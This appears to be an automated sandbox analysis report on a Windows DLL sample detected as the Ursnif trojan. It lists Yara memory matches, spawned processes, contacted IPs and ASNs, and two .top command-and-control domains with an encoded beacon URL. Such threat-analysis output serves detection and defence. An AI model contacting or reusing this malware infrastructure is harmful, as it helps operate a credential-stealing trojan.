Source: Yara match File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY
Behavior Graph

Graph ID: 338663, Sample: zQ32b1FVcL.dll, Start date: 12/01/2021, Architecture: WINDOWS, Score: 64
Start: Found malware configuration; Yara detected Ursnif
  loaddll32.exe
    DNS: babidone.top
    Writes or reads registry keys via WMI; Writes registry values via WMI
  iexplore.exe
    192.168.2.1 (unknown)
    iexplore.exe (child): begoventa.top 47.91.89.242, ports 49746, 49747, 80, CNNIC-ALIBABA-US-NET-AP Alibaba US Technology Co Ltd, United States
  iexplore.exe
    iexplore.exe (child): babidone.top 193.56.255.166, ports 443, 80, INFOCLOUD-SRL MD, Romania
  2 other processes
    iexplore.exe (child)
    iexplore.exe (child)

Contacted Public IPs

IP              Domain   Country        ASN     ASN Name                                              Malicious
193.56.255.166  unknown  Romania        213137  INFOCLOUD-SRL MD                                      false
47.91.89.242    unknown  United States  45102   CNNIC-ALIBABA-US-NET-AP Alibaba US Technology Co Ltd  false

Private

IP
192.168.2.1

Contacted Domains

Name           IP              Active
begoventa.top  47.91.89.242    true
babidone.top   193.56.255.166  true

Contacted URLs

Malicious  Antivirus Detection    Reputation  Name
false      Avira URL Cloud: safe  unknown     http://begoventa.top/favicon.ico
false      Avira URL Cloud: safe  unknown     http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi